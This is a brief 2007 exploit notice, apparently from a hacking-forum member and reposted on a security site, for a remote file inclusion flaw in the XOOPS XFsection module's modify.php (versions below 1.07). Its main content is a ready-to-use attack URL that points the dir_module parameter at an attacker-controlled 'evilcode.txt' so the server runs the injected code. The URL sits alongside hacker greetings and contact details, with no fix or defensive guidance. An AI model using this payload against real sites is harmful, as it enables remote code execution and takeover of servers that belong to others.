Title : XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability Date : 2007-06-15 Code : Rated as : Moderate Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ XOOPS Module XFsection Remote File Inclusion version: < 1.07 source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO Contact: splo1t[at]yahoo[dot]com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: In some cases you will need to be authenticated. # securitydot.net Sat, 07 Nov 2009 17:14:51 +0000